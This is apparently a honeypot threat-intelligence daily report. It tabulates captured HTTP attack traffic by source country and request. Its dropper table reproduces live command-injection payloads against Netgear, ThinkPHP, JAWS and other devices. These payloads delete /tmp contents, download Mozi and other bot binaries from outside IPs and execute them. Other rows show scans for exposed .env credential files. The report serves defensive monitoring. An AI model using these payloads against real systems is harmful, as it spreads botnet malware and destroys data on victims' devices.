Daily Report: 2025-03-29#
Interaction report on http service of various honeypot around the world.
ot_simplified_report#
Simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
CN | Georgia |
MY | |
LV |
botnet_dropper_behaviour#
List of requests suspected of having stage 1 dropper behavior (programs designed to extract other files from their own code).
remote_addr | request |
---|---|
42.227.166.156 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.227.166.156:52343/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
103.207.124.231 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
178.72.78.8 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
120.85.117.186 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
141.98.11.210 | POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1 |
118.40.165.223 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
31.170.22.205 | GET /cgi-bin/live_api.cgi?page=satellite_list&id=&ip=$(cd+/var/tmp;wget+http://31.170.22.205/dl18;curl+-O+http://31.170.22.205/dl18;sh+dl18) HTTP/1.1 |
180.153.27.22 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
58.242.106.187 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1 |
182.84.138.116 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
88.247.162.58 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘rm -rf bejv86; wget http://176.65.134.201/bejv86 -O /tmp/.Aqua; chmod 777 /tmp/.Aqua; /tmp/.Aqua thinkphp.selfrep’ HTTP/1.1 |
185.233.117.25 | GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://152.42.234.215/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1 |
request#
List of requests of the day that have never been detected, other requests that have already been detected and archived in the request database..
number_of_occurence | request | |
---|---|---|
225 | 4 | GET /dependencies/.env HTTP/1.1 |
239 | 3 | CONNECT pro.ip-api.com:443 HTTP/1.1 |
240 | 3 | \x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00pro.ip-api.com\x00 |
267 | 2 | GET /robots/.env HTTP/1.1 |
270 | 2 | GET /~admin/.env HTTP/1.1 |
292 | 2 | GET /upload/.env HTTP/1.1 |
294 | 2 | GET /html/.env HTTP/1.1 |
295 | 2 | GET /v1 HTTP/1.1 |
353 | 1 | GET /Laravel/.env HTTP/1.1 |
357 | 1 | GET /.config.yaml HTTP/1.1 |
359 | 1 | GET /data/.env HTTP/1.1 |
361 | 1 | GET /inc/.env HTTP/1.1 |
362 | 1 | GET /misc/.env HTTP/1.1 |
369 | 1 | \x04\x01\x01\xBB@\xE9\xA2\x93adm:12345\x00 |
383 | 1 | GET /Api/.env HTTP/1.1 |
384 | 1 | GET /doc/.env HTTP/1.1 |
400 | 1 | \x04\x01\x01\xBB@\xE9\xA2i\x00 |
595 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&TPFME=BK0NI HTTP/1.1 |
596 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&J6EHU=ORME4 HTTP/1.1 |
597 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&WAL7Z=NBHQW HTTP/1.1 |
598 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&UM446=FADMG HTTP/1.1 |
599 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&6K4U8=807YZ HTTP/1.1 |
629 | 1 | GET /vicidial/welcome.php HTTP/1.1 |
665 | 1 | GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&5XVSK=28GHM HTTP/1.1 |
country_iso_code#
List of country names and number of requests received by IPs located in these countries.
number_of_occurence | country_iso_code | |
---|---|---|
0 | 1035 | NL |
1 | 395 | US |
2 | 382 | BG |
3 | 323 | GB |
4 | 174 | CN |
5 | 168 | MY |
6 | 104 | SC |
7 | 83 | HK |
8 | 65 | PL |
9 | 63 | IN |
10 | 55 | CH |
11 | 53 | KR |
12 | 52 | BE |
13 | 51 | SG |
14 | 47 | VN |
15 | 25 | LV |
16 | 21 | UA |
17 | 20 | DE |
18 | 20 | LT |
19 | 13 | RO |
20 | 12 | FR |
21 | 11 | PT |
22 | 11 | NG |
23 | 11 | GH |
24 | 9 | CA |
25 | 8 | JP |
26 | 6 | BR |
27 | 6 | ID |
28 | 6 | IR |
29 | 5 | TR |
30 | 4 | RU |
31 | 2 | CZ |
32 | 2 | AZ |
33 | 2 | AO |
34 | 2 | ZA |
35 | 1 | MC |
36 | 1 | BD |
37 | 1 | AR |
38 | 1 | ES |
39 | 1 | TH |
40 | 1 | RW |
41 | 1 | GE |
42 | 1 | IT |
43 | 1 | AE |